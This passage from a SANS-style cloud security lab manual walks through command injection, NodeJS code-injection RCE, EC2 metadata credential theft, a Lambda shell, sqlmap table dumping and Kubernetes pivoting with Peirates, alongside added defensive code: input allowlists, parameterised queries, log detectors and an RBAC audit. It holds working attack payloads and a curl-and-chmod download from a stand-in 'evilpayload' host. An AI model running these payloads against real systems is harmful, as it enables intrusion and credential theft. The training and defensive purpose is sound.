round-trip min/avg/max/stddev = 0.032/0.041/0.051/0.000 ms
========
PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=
With this string in hand you can decode it. Open a MATE Terminal and copy the string like so:

$ echo "PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=" | base64 -d

Note that the system will break up the string; you need to make it all appear on one single line to work.

As we can see, this is a very simple way of getting access to both source code and the ability to smuggle out items.

Let's explore what is on this container. Type in the following commands to try:

127.0.0.1; echo "============"; env

127.0.0.1; echo "============"; hostname

127.0.0.1; echo "============"; which curl

127.0.0.1; echo "============"; which nc

We can see that the container has some interesting items that we may wish to explore in the future.
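Decoding the base64 string above shows that ping.php passes $_GET['system'] straight into system("ping -c2 $system"), which is the whole bug. The following is an added Python example, not the lab's code, that decodes that same string, shows the hardened form of the handler (allowlist the target, then run ping with an argv list and no shell), and runs a small detector over constructed Apache-style access-log lines to flag the requests from this walkthrough. The hostname rule, the log lines and the parameter handling are constructed here; only the base64 blob is the page's own.

```python
"""Hardened counterpart of ping.php plus a log detector (added example)."""
import base64
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# The base64 string the walkthrough extracts from the container.
PING_PHP_B64 = ("PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107"
                "CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=")


def decode_ping_php():
    """Recover the vulnerable source: system("ping -c2 $system")."""
    return base64.b64decode(PING_PHP_B64).decode()


# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$", re.IGNORECASE)


def is_valid_ping_target(value):
    """Allowlist: an IP literal or a hostname.  Anything else, including
    '127.0.0.1; ls', is rejected before a command is built."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def build_ping_argv(target):
    """Replacement for system("ping -c2 $system"): the target is a single
    argv element and no shell is involved, so ';' or '|' cannot chain
    commands even if validation were loosened."""
    if not is_valid_ping_target(target):
        raise ValueError("invalid ping target")
    return ["ping", "-c", "2", target]


def rejects(target):
    """True when build_ping_argv refuses the value."""
    try:
        build_ping_argv(target)
    except ValueError:
        return True
    return False


def run_ping(target):
    """Execute safely; shell=False is subprocess.run's default."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=15)
    return proc.stdout


# Shell metacharacters that never belong in a ping target.
INJECTION_RE = re.compile(r"[;&|`\n]|\$\(")
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+"')


def flag_injection_attempts(log_lines):
    """Return (client, decoded 'system' value) for /ping requests whose
    parameter carries shell metacharacters."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if parts.path != "/ping":
            continue
        for value in parse_qs(parts.query).get("system", []):
            if INJECTION_RE.search(value):
                hits.append((client, value))
    return hits


# Constructed access-log lines in Apache combined format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jul/2020:10:00:01 +0000] "GET /ping?system=127.0.0.1 HTTP/1.1" 200 312 "-" "curl/7.68.0"',
    '10.0.0.9 - - [28/Jul/2020:10:00:07 +0000] "GET /ping?system=127.0.0.1%3B+ls HTTP/1.1" 200 340 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [28/Jul/2020:10:00:15 +0000] "GET /ping?system=127.0.0.1%3B+cat+ping.php+%7C+base64 HTTP/1.1" 200 420 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [28/Jul/2020:10:00:20 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
```

The detector keys on the `system` parameter name because that is what the decoded source reads; if the form submits by POST the value is not in the access log and the same check has to run in the application or a WAF instead.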
Indirect Command Injection

What about a more interesting command injection technique, one which is not so easy to trigger? This particular flaw is a Code Injection flaw that will lead us to Remote Command Execution. Head over to the main site:

invoice.<class-subdomain>.sec588.net

Let's attempt the same trick. First let's enter an invoice number.

What we see is some information on the screen: the name of the container as well as the invoice date.

Let's now attempt the same command injection technique. Attempt to type:

1%3Bls

This should provide us with an error. If it does not come back right away, restart the request. It may also be helpful to run this on the command line with curl in case the system is not responding, which happens from time to time.

For curl enter this into the command line:

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=1%3B+ls"

What is returned will be a stack trace from a NodeJS server.

NodeJS is not the same as many of the other systems in that it cannot shell out directly. Instead it will require a shell to be constructed out of a set of NodeJS code, and the return on that execution must be handled or the injection will be blind. Here are some good ways to execute code.

Using the fs library you can do the following: to ls a directory you would want to use readdirSync(); to cat a file you would want to use readFileSync().

To execute a command, however, you need to use the child_process library. To execute a command that returns with child_process you can use exec, but it will not return output; instead use execSync.

One thing to note is that the default programming pattern in NodeJS for a request and response is to use the words res and req, so we will need to end the response and, in the ending of the response, start a new request. It will look strange.
In the invoice field of the browser let's try the following:

res.end(require('fs').readdirSync('.').toString())

Alternatively in cURL:

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readdirSync('.').toString())"

This should output a list of files in a directory.

Note the text will look like HTML!

You may see words appear like Dockerfile, index.js, node_modules and the like.

This particular container may have shipped with a Dockerfile; let's read it.

In the browser enter:

res.end(require('fs').readFileSync('Dockerfile').toString())

Alternatively in cURL:

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readFileSync('Dockerfile').toString())"

This would display the contents of the Dockerfile.

What happens if we try and read the root of the filesystem? In the browser enter:

res.end(require('fs').readdirSync('/').toString())

Alternatively in cURL enter the following:

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readdirSync('/').toString())"

It will more than likely fail. The URL shows us the following: http://expected-invoice-svc.default.svc.cluster.local:8080/api/expected-date/res.end(require('fs').readdirSync('/').toString())
Maybe the / needs to be DOUBLE URL encoded to work (%252F). The first layer of URL encoding is consumed by the front end service and the second layer is consumed heading to the second system.

In the browser enter: res.end(require('fs').readdirSync('%252F').toString())

In cURL enter the following command: $ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readdirSync('%252F').toString())"

How can we trigger command execution this way?

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('child_process').execSync('ls').toString())"

Alternatively, if we only had the ability to read and write to the file system, we could use this command:

Please note we are using a random file name because multiple students will be attacking the same host. The general task here is to put our return values in a file like so: "ls > random_file_name" where "random_file_name" is something you choose.

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('child_process').exec('ls > <pick a random name>').toString())"

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readFileSync('<same as the above command random name>').toString())"

Now we have a very rudimentary RCE. We can from here go further, such as reading environment variables and more. Is this pretty? No, no one would actually want to hack this way for long; however, it does get us the access we need.

With this level of access we now have 2 remote code executions and an SSRF bug. This will provide us with the beginnings of a way to get deeper into a web application.
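The root cause on the front end is that the submitted invoice id is appended unvalidated to an internal URL, and each service hop URL-decodes the path once, which is why %252F arrived at the second service as a bare slash. The following added Python example, not the lab's code, models that front end: it shows what a value looks like after a given number of decoding hops, the raw concatenation the walkthrough observed, and a hardened builder that allowlists the id and percent-encodes the segment. The upstream URL is the one from the error message above; the numeric-id rule is an assumed business rule.

```python
"""Multi-hop decoding and path-segment hardening (added example)."""
import re
from urllib.parse import quote, unquote

# Copied from the error shown in the walkthrough.
UPSTREAM = ("http://expected-invoice-svc.default.svc.cluster.local:8080"
            "/api/expected-date/")


def decode_hops(value, hops):
    """Apply one URL decoding per service hop and return what the service
    `hops` decodes downstream actually sees."""
    for _ in range(hops):
        value = unquote(value)
    return value


def build_upstream_url_unsafe(invoice_id):
    """Mirrors the observed behaviour: raw concatenation, so whatever was
    typed becomes the last path segment of the internal request."""
    return UPSTREAM + invoice_id


# Assumed business rule: invoice ids are short decimal numbers.
INVOICE_ID_RE = re.compile(r"[0-9]{1,12}")


def build_upstream_url(invoice_id):
    """Hardened: allowlist the id, then percent-encode the segment with no
    characters exempt, so even an accepted value cannot add path parts
    or carry code to the next service."""
    if INVOICE_ID_RE.fullmatch(invoice_id) is None:
        raise ValueError("invoice id must be numeric")
    return UPSTREAM + quote(invoice_id, safe="")


def accepted(invoice_id):
    """True when the hardened builder lets the value through."""
    try:
        build_upstream_url(invoice_id)
    except ValueError:
        return False
    return True
```

The second service still has its own bug (it evaluates the path segment as JavaScript), and that must be fixed there; the front-end allowlist only ensures that nothing but a number ever reaches it.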

Why This Lab Is Important

In the last 2 labs we have gone from a non-privileged, or less than privileged, AWS user to a user that has the capability to perform additional functions. By performing these operations we should be able to gain more access to the AWS environments, and we can show the criticality of why these keys need to be protected.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Lab 4.4: Backdoors in Serverless Functions

Brief Intro

While command injection and SSRFs are attacks that plague a wide number of applications and allow for internal pivots, serverless functions themselves can allow us to move around the environment.

In this lab we are going to introduce you to a serverless environment where we can upload a JavaScript NodeJS function that will give us a full file shell.

Requirements for This Lab

This lab requires the student to have:

Finished Lab 4.2

Have a stable internet connection, with a web browser and access to cURL.

Try It Yourself

If you wish to try this on your own:

1. You should be using the same AWS credentials from Lab 2.5 for this lab (profile named lab25).

2. SSH into the IP address from Lab 2.5 that has the ec2-kms-role.

3. Use the Lambda-shell project in /opt/lambda-shell.

4. The apex binary will allow you to execute the shell.

Walkthrough

Getting an access token

We are going to use our access_token from Section 2. Let's try and use this token:

$ aws iam get-role --role-name ec2-kms-role-<class-subdomain> --profile lab25
If you get an error that the token is now expired: the tokens in the metadata API have a maximum expiration of 6 hours. To get this token to function we will need to get a new token:

ssh -i /home/sec588/files/workdir/studentX-<class-subdomain>.pem ubuntu@<ip from section2>
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-kms-role-<class-subdomain>

This command does the following:

SSH into the host as the ubuntu user

Get access to the IAM MetaData service through cURL.

With this session token we can now deploy a lambda function. We have provided a lambda shell function in the IAM so that you can explore how to execute a shell within a Lambda function.

Editing the project file

We need to first figure out the IAM Role that we are using. One way is to run a command like so:

$ aws iam get-user --profile lab25

This WILL fail, but it will give you the information needed to proceed.

You will see an error that shows that the command was not successful, but it will also show you the IAM ARN:

arn:aws:sts::<account id>:assumed-role/ec2-kms-role-<class-subdomain>/<instance id>

The information you will need is:

The <account-id>

The role as follows: ec2-kms-

With this role noted, we can now use pieces of this information correctly.

Our example shell is located at /opt/lambda-shell. To use it we need to make a few changes:

First you need to edit /opt/lambda-shell/project.json

Change two sections of this:
First there is a line that reads: "name": "lambda-shell-student9001"

Change 9001 to your student number.

Second there is a line that reads the role; the role should be: "arn:aws:iam::<number>:role/ec2-kms-role-<class-subdomain>"

You will need to validate a few things:

The account is valid

The <class-subdomain> role is valid

If they are, we can then move on to run and execute the role.
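The project.json edit above takes the account id and role name out of the assumed-role STS ARN that the failing `aws iam get-user` call prints and turns them into an IAM role ARN. The following is an added Python example, not part of /opt/lambda-shell, that does that conversion with validation, applies the two field changes, and checks the Expiration field of a metadata-service credential document so an expired token is noticed before a deploy fails. The ARN values, the "role" key name in project.json and the credential document are constructed placeholders.

```python
"""project.json helpers and credential expiry check (added example)."""
import json
import re
from datetime import datetime, timezone

STS_ARN_RE = re.compile(
    r"^arn:aws:sts::(?P<account>\d{12}):assumed-role/"
    r"(?P<role>[^/]+)/(?P<session>[^/]+)$")


def iam_role_arn(sts_arn):
    """arn:aws:sts::ACCT:assumed-role/ROLE/SESSION -> arn:aws:iam::ACCT:role/ROLE"""
    m = STS_ARN_RE.match(sts_arn)
    if m is None:
        raise ValueError("not an assumed-role STS ARN")
    return f"arn:aws:iam::{m['account']}:role/{m['role']}"


def patch_project(project, student_number, sts_arn):
    """Return a copy of the project.json dict with the two fields the
    walkthrough changes.  The 'role' key name is an assumption about the
    apex project layout."""
    patched = dict(project)
    patched["name"] = f"lambda-shell-student{student_number}"
    patched["role"] = iam_role_arn(sts_arn)
    return patched


# Shape of /latest/meta-data/iam/security-credentials/<role>; every value
# below is a constructed placeholder, not a real credential.
SAMPLE_CREDS = json.dumps({
    "Code": "Success",
    "LastUpdated": "2020-07-28T10:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIA-PLACEHOLDER",
    "SecretAccessKey": "placeholder-secret",
    "Token": "placeholder-session-token",
    "Expiration": "2020-07-28T16:00:00Z",
})


def parse_utc(stamp):
    """Timestamps in the document are UTC with a trailing 'Z'."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(
        tzinfo=timezone.utc)


def seconds_remaining(doc, now_iso):
    """Seconds until the credential document expires (negative if past)."""
    exp = parse_utc(json.loads(doc)["Expiration"])
    return (exp - parse_utc(now_iso)).total_seconds()


def credential_expired(doc, now_iso):
    return seconds_remaining(doc, now_iso) <= 0
```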

Executing our shell

First we need to deploy our shell to a new lambda function:

$ cd /opt/lambda-shell
$ apex --profile lab25 deploy

It should finish; if it does then we can execute it using our looping function:

$ ./lambda-shell

With the lambda-shell running we are now able to run some commands and explore.

Type:

ls

This will take a few minutes to run as the lambda function will need to deploy and execute. After it is deployed you can now run with a much faster motion as it is a warm started condition.

One of the things about Lambdas that you may notice right away is that many of them may not have the IP connectivity we are used to.

Type: $ ip

You will get an error from /bin/sh that ip is not found.
Type: id; whoami

You will probably see that you are running as a random lower privileged sandbox user.

As a matter of fact, this particular container may actually be Amazon Linux:

Type: cat /etc/system-release

You will see that it is of: Amazon Linux 2 (Karoo)

Once again we are challenged with some items like: are we able to move laterally? The answer will depend on a few things:

1. What IAM privileges do we have with the Lambda

2. What VPC is the Lambda in

3. What else can the Lambda do?

Because we are executing and creating this lambda ourselves, it is not the same as an already running lambda that can do command execution.

Type: env

What we can see are various variables including the 169.254 address space. This shell allows us to better understand how serverless environments work and their limitations. Each serverless container will be different, so a Python runtime will behave differently than a NodeJS runtime and the like. If you would like to see how the runtimes operate you can view this directory that holds the runtime:

Type: env | grep runtime

Look for LAMBDA_RUNTIME_DIR=, which in our case is the /var/runtime directory. You can explore these files; some will work, some won't. If you get stuck, ^C the shell and come back in.

Type: ls /var/runtime

Conclusion

Serverless environments will have various limitations depending on the cloud provider. AWS Lambda, for example, is a rather constrained serverless environment that is different than Azure. Our explorations will highlight the differences.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Lab 4.5: SQL Injections in RDS

Brief Intro

SQL Injections can be very difficult to understand. There are many areas in which the injection can be broken; some of it will lead to successful exploitation and some will not. Some will be easy to uncover and some will not. This lab is designed to reflect on how this is possible and in which conditions exploitation is available to us.

Overall Lab Architecture

We have an application that is located on the following URL:

http://sqlinj.<class-subdomain>.sec588.net/index.php

This application is very straightforward:

1. It has a form that will reach out to /api.php

2. The order_id= is filled out with what is passed on the form.

3. The result of the query to order_id= is a JSON array that is successfully returned.

4. The array is called via cURL in PHP.

5. Once the query comes back it is rendered in a JSON array

The screenshot below shows our API call:

Let's explore this environment so that we can try and uncover any types of SQL Injections.

Requirements for This Lab

This lab requires the student to have:

Have a stable internet connection, with a web browser and access to a copy of SQLMap.

Try It Yourself

If you wish to try this on your own:

1. Look at the URL in question: http://sqlinj.<class-subdomain>.sec588.net/index.php

2. Try looking up invoice 1234.

3. Try some of the common SQL Injection techniques: ' , "

4. Look at the RESTful API call: http://sqlinj.<class-subdomain>.sec588.net/api/1234

5. Try using sqlmap on both of these URLs.

6. Look at the underlying code in the walkthrough, and see if you can uncover the actual URL.

7. Use SQLMap against the new URL, and see if it is vulnerable to SQL Injection.

Walkthrough

Looking for Obvious SQL Injections

Some SQL Injections are very obvious; others are not. Let's look at our site:

http://sqlinj.<class-subdomain>.sec588.net/index.php
This website has one form, in which we test for SQL Injection.

Let's try a few common SQL Injection tests that will try to display 'Error Based SQL'. This type of SQL Injection is not as common, and we can see that this type of testing will not yield us any obvious result.

' or "

in the form will not show us error based SQL. What about if we use a tool like sqlmap.py?

Using SQLMap with RESTful APIs

Open up a MATE Shell and let's execute SQLMap:

$ cd /opt/sqlmap
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net' --data "order_id=1234&submit=submit"
This will run SQLMap with the following switches:

-u provides the URL in question

--data "order_id=1234&submit=submit" sends a POST with the appropriate values that are submitted with the form

Many of our APIs are RESTful in nature, and this particular endpoint is no different. Let's take a look at the code powering our website.

<?php
if (isset($_POST['order_id']) && $_POST['order_id']!="") {
    $order_id = $_POST['order_id'];
    $url = "http://localhost/api/$order_id";
    $client = curl_init($url);
    curl_setopt($client,CURLOPT_RETURNTRANSFER,true);
    $response = curl_exec($client);
    $result = json_decode($response);
}

Notice the following two lines in this statement:

$order_id = $_POST['order_id'];

$url = "http://localhost/api/$order_id";

These lines show us that the value is being passed in an HTTP POST and then passed on as part of a URL.

This type of information can be pulled out of websites in multiple ways. For this particular lab we are skipping the methods for obtaining the source code. Instead we are focusing on the URLs:

http://sqlinj.<class-subdomain>.sec588.net/api/1234

Open Firefox and go to the appropriate URL:

Let's try getting a URL: http://sqlinj.<class-subdomain>.sec588.net/api/%27

What we see is an Apache error message, stating that a specific page is not found. This is not a PHP error or MySQL error message. There could be a few ways that this is occurring. Here is a shortcut.

Looking at RESTful APIs

Our .htaccess file is re-writing URLs so that PHP based code is now a RESTful endpoint.

RewriteEngine On
# Turn on the rewriting engine

RewriteRule ^api/([0-9a-zA-Z_-]*)$ api.php?order_id=$1 [NC,L]
The RewriteRule shows us that anything that is passed in the URL is rewritten to a URL that has a variable of order_id. It is also matching a regex value of only numbers or letters, no special characters.

The following two URLs are the same:

/api/1234

/api.php?order_id=1234

SQL Injecting the RESTful Endpoint

What if we attempt SQL Injection on this particular endpoint?

We see a JSON array is returned, and the JSON array is rendered NULL. Let's look at the code that is causing our injections:

if (isset($_GET['order_id']) && $_GET['order_id']!="") {
    $order_id = $_GET['order_id'];
    $sql = "SELECT * FROM transactions WHERE order_id = $order_id";
}

The vulnerability here is that whatever is passed into the GET parameter of order_id is directly passed into SQL. Without any filtering this is directly passed into the SQL engine. This is classic SQL Injection, but without tools it would not be discoverable.
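The api.php snippet above interpolates order_id straight into the statement, and the .htaccess regex only hides that from the pretty URL. The following added Python example, not the lab's code, reproduces the pattern against an in-memory SQLite table with made-up rows, shows that a quote produces the database error that error-based probing looks for and that a tautology returns every row, and puts the parameterised query next to it. It also evaluates the RewriteRule regex to show which inputs it filters; direct requests to api.php?order_id= never pass through that rule at all. Table rows and the numeric-id rule are constructed here.

```python
"""Interpolated vs. parameterised order_id lookup (added example)."""
import re
import sqlite3


def make_db():
    """Constructed transactions table standing in for the RDS database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE transactions ("
                 "order_id INTEGER PRIMARY KEY, customer TEXT, amount REAL)")
    conn.executemany("INSERT INTO transactions VALUES (?, ?, ?)",
                     [(1234, "alice", 19.99), (1235, "bob", 5.00),
                      (1236, "carol", 120.50)])
    conn.commit()
    return conn


def lookup_unsafe(conn, order_id):
    """Same shape as: $sql = "SELECT * FROM transactions WHERE order_id = $order_id";"""
    sql = f"SELECT * FROM transactions WHERE order_id = {order_id}"
    return conn.execute(sql).fetchall()


def unsafe_raises_error(conn, order_id):
    """True when the injected text breaks the statement; that database
    error is what error-based probing relies on."""
    try:
        lookup_unsafe(conn, order_id)
    except sqlite3.OperationalError:
        return True
    return False


def lookup_safe(conn, order_id):
    """Validate the type, then bind the value; a bound parameter can never
    become SQL syntax."""
    if re.fullmatch(r"[0-9]{1,10}", order_id) is None:
        raise ValueError("order_id must be numeric")
    return conn.execute("SELECT * FROM transactions WHERE order_id = ?",
                        (int(order_id),)).fetchall()


def safe_rejects(conn, order_id):
    """True when the hardened lookup refuses the value."""
    try:
        lookup_safe(conn, order_id)
    except ValueError:
        return True
    return False


# The RewriteRule from the walkthrough: only these characters reach
# api.php through /api/<id>.  Requests to api.php?order_id= skip it.
REWRITE_RE = re.compile(r"^api/([0-9a-zA-Z_-]*)$")


def rewrite_accepts(path):
    """Would the pretty URL be rewritten to api.php?order_id=...?"""
    return REWRITE_RE.match(path) is not None
```

The rewrite regex is a routing rule, not a security control: it stops a quote from reaching the query through /api/, which is why the form test showed nothing, while the underlying api.php stays fully injectable.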

Let's try the following: open a MATE terminal and run the following commands:
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234'

If you accept the defaults you will see that SQL Injection is now possible.

Carefully Constructing Queries

We need to be careful as this particular system may be a shared database instance. Heavy queries should be avoided if possible, and having shells is not possible in many cloud environments, as they do provide us with clear guidance on this. Attempt some of the following queries:

$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' --dbs

This should show us the databases on the system. Let's also see all the tables in the db database:
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db --tables

The database should have a single table, which would be the transactions table. We can dump this table, or continue looking for more tables. Let's just play with the single database views.

$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db -T transactions --count

We can see how many items are in the database using the count command. How can we safely dump a record to see?

$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db -T transactions --dump --start=1 --stop=1

This concludes our tour of SQLMap and how to find injections in Cloud Native Applications. We do request that dangerous commands like Command Shells not be executed in the context of this lab, as it can violate the Terms of Service in the AWS environment.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Lab 4.6: Kubernetes and Peirates

Brief Intro

Kubernetes is a container orchestration and lifecycle management framework. It is not the only framework that does this, as there are a few others, but by far and away Kubernetes has done a very good job in being the most commonly used one today. As such, Kubernetes has a management layer that is implemented on top of existing cloud environments. There are several ways to manage Kubernetes. There is a "Managed Configuration", in which a cloud provider will manage the Kubernetes cluster for you and use their native Access Management framework for Kubernetes management.

The other way to manage the system is what is known as "Unmanaged Kubernetes", in which the system is not managed in any meaningful way by the cloud provider. This would be on-premise or an in-the-cloud managed Kubernetes. Kubernetes, being such a complex system, does have "vendor supported" implementations. Which ones?

Rancher

Heptio

Kontena

Pivotal Container Service

While each of these has their specific reasons for existing, we will be working with two types of Kubernetes in our class environments:

AWS EKS (Elastic Kubernetes Service) and unmanaged with KOPS.

KOPS is the Kubernetes Operations Service (https://github.com/kubernetes/kops).

In this lab we will give you a tour of the following:

Kubernetes to Manage Containers
Privileged Pod Deployments

Peirates for Pivoting around an Environment

Requirements for This Lab

This particular lab will require the following components:

1. The aws cli tools

2. The profile AWS keys obtained in Lab 1.4 and used in Lab 2.2

3. kubectl binary

4. peirates binary

Try It Yourself

Walkthrough

Getting a working kubectl configuration

Some AWS users may have rights to Kubernetes; this will depend on a few things.

1. Who has access rights to build a Kubernetes configuration file that can get a user to have a proper configuration to use with their kubectl.

2. Who has rights inside of the Kubernetes cluster.

Each user may or may NOT have access to the RBAC cluster; by default many AWS users do not. Kubernetes has an Authentication and now an Authorization access control system.

AuthN and AuthZ (https://kubernetes.io/docs/reference/access-authn-authz/rbac/)

Explicitly there is even the following warning:

The following policy allows ALL service accounts to act as cluster administrators. Any application running in a container receives service account credentials automatically, and could perform any action against the API, including viewing secrets and modifying permissions. This is not a recommended policy.
kubectl create clusterrolebinding permissive-binding \
--clusterrole=cluster-admin \
--user=admin \
--user=kubelet \
--group=system:serviceaccounts

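The warning and binding above describe the misconfiguration a defender should be hunting for: cluster-admin handed to the system:serviceaccounts group. The script below is an added example for this lab (not course code and not part of Peirates) that audits the JSON from `kubectl get clusterrolebindings -o json` for exactly that pattern; the SAMPLE_CRB_JSON it falls back to is constructed to mimic that output and contains the permissive-binding shown above.

```python
"""Audit ClusterRoleBindings for a high-privilege ClusterRole bound to every
service account (or to an even broader built-in group).

Added example for this lab; not course code and not part of Peirates. It
expects the JSON that `kubectl get clusterrolebindings -o json` produces;
SAMPLE_CRB_JSON below is constructed to mimic that output."""
import json
import sys

# ClusterRoles that amount to unrestricted API access.
HIGH_PRIVILEGE_ROLES = {"cluster-admin"}

# Built-in groups far too broad to carry such a role.
BROAD_GROUPS = {
    "system:serviceaccounts",   # every service account in every namespace
    "system:authenticated",     # every authenticated identity, SAs included
    "system:unauthenticated",   # anonymous callers
}


def describe_subject(subject):
    """Render an RBAC subject as Kind:name[@namespace] for reporting."""
    text = f"{subject.get('kind', '?')}:{subject.get('name', '?')}"
    if subject.get("namespace"):
        text += f"@{subject['namespace']}"
    return text


def is_broad_subject(subject):
    """True for group subjects that cover all service accounts or all users.
    system:serviceaccounts:<ns> is every service account in one namespace."""
    if subject.get("kind") != "Group":
        return False
    name = subject.get("name", "")
    return name in BROAD_GROUPS or name.startswith("system:serviceaccounts:")


def find_permissive_bindings(crb_list):
    """Return one finding per (binding, broad subject) pair that grants a
    high-privilege ClusterRole. A binding with no subjects grants nothing."""
    findings = []
    for item in crb_list.get("items", []):
        role_ref = item.get("roleRef", {})
        if role_ref.get("kind") != "ClusterRole":
            continue
        if role_ref.get("name") not in HIGH_PRIVILEGE_ROLES:
            continue
        binding = item.get("metadata", {}).get("name", "<unnamed>")
        for subject in item.get("subjects") or []:
            if is_broad_subject(subject):
                findings.append({
                    "binding": binding,
                    "role": role_ref["name"],
                    "subject": describe_subject(subject),
                })
    return findings


# Constructed sample: the default system:masters binding (expected in every
# cluster) plus the permissive-binding from the documentation warning.
SAMPLE_CRB_JSON = """{
  "apiVersion": "v1",
  "kind": "List",
  "items": [
    {"kind": "ClusterRoleBinding",
     "metadata": {"name": "cluster-admin"},
     "roleRef": {"apiGroup": "rbac.authorization.k8s.io", "kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"apiGroup": "rbac.authorization.k8s.io", "kind": "Group", "name": "system:masters"}]},
    {"kind": "ClusterRoleBinding",
     "metadata": {"name": "permissive-binding"},
     "roleRef": {"apiGroup": "rbac.authorization.k8s.io", "kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [
       {"apiGroup": "rbac.authorization.k8s.io", "kind": "User", "name": "admin"},
       {"apiGroup": "rbac.authorization.k8s.io", "kind": "User", "name": "kubelet"},
       {"apiGroup": "rbac.authorization.k8s.io", "kind": "Group", "name": "system:serviceaccounts"}
     ]}
  ]
}"""


def audit_json_text(text):
    """Parse kubectl JSON output and return the findings list."""
    return find_permissive_bindings(json.loads(text))


def main():
    # Usage: python audit_crb.py <file with kubectl JSON>; with no argument
    # the constructed sample is audited.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CRB_JSON
    findings = audit_json_text(text)
    for f in findings:
        print(f"[!] {f['binding']}: {f['role']} granted to {f['subject']}")
    if not findings:
        print("no over-broad high-privilege bindings found")


if __name__ == "__main__":
    main()
```

The default cluster-admin binding to system:masters is deliberately left alone, so the only finding on the sample is the permissive-binding's system:serviceaccounts subject.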
We will begin by finding any EKS clusters:

aws eks list-clusters --region us-east-1 --profile lab22

You should see a cluster called:

class-eksctl-<class-subdomain>

Next we will build our own Kubernetes Configuration from EKS. While this may not be your starting point for attacking a live Kubernetes Cluster, given that we have a set of API keys we can start here:

aws eks update-kubeconfig --name class-eksctl-<class-subdomain> --region us-east-1 --profile lab22

The output should reflect that we have a new .kube/config file created. With this file we can now manage a Kubernetes Cluster.

You will need at a minimum eks:DescribeCluster permissions for this to work.

This does not grant you access to a Kubernetes Cluster; it only grants you access to get a configuration. You should note that this was the default configuration in versions prior to 1.2, and while more and more rare, could still be the case.

How can we test this configuration?

kubectl get pods
You can also see more information like so:

kubectl get pods -o wide

This command should output any pods that we may have running in our environment. There are many pods and containers that may be running. We can attach to one of these instances by running the following command:

kubectl exec -ti <container> /bin/bash

This would allow us to interact with the container's /bin/bash environment.

You may not get a prompt!

ls

This should work.

Now that we have this level of access let's see how we can make better assumptions.

CTRL-C

Can you get pods? Let's find out:

$ kubectl auth can-i get pods

$ kubectl auth can-i exec pods

We have a few options; if you recall from an earlier exercise we had command injection.

Let's play with this:

$ kubectl get pods

Find the ping-svc; this was the vulnerable process against which we are going to execute a few commands.

Find a directory to run our payload. We will create one in /tmp/.studentX, replacing X with your numerical value:

$ kubectl exec ping-svc-<random-number> mkdir /tmp/.studentX

$ kubectl cp /opt/peirates/peirates ping-svc-<random-number>:/tmp/.studentX/peirates
Now why would we want to run peirates anyway, when we already have some form of elevated access? Well, we do want to demonstrate that peirates is able to be moved into a pod with much more ease than kubectl, as it is a smaller system.

Using the command injection lab, one of the options that we could also attempt is:

This is just an example command, do not run:

cmdinj.php?=curl+http://evilpayload/peirates+-O+/tmp/peirates;/bin/chmod+777+/tmp/peirates

This would download the binary to the system; we would need a separate way to gain access to the system.

This will take some time to copy. Once it is there we can then execute peirates; there are a few ways to do this, we could always:

$ kubectl exec -i ping-svc-<random-number> /tmp/.studentX/peirates

If you miss the -i it will not work; you will need to CTRL-C.

From here we will have a menu system. A few things we can do:

1. Type 3 to get a list of pods
2. Type 10 to get a list of secrets!

One final thing we can do is to actually use the service account kubelet if it is misconfigured against the system. This would require a serious node misconfiguration, but these configurations are not uncommon:

$ kubectl get secrets

We should see a list of secrets; record the name of the secret, you will need it for the next commands.

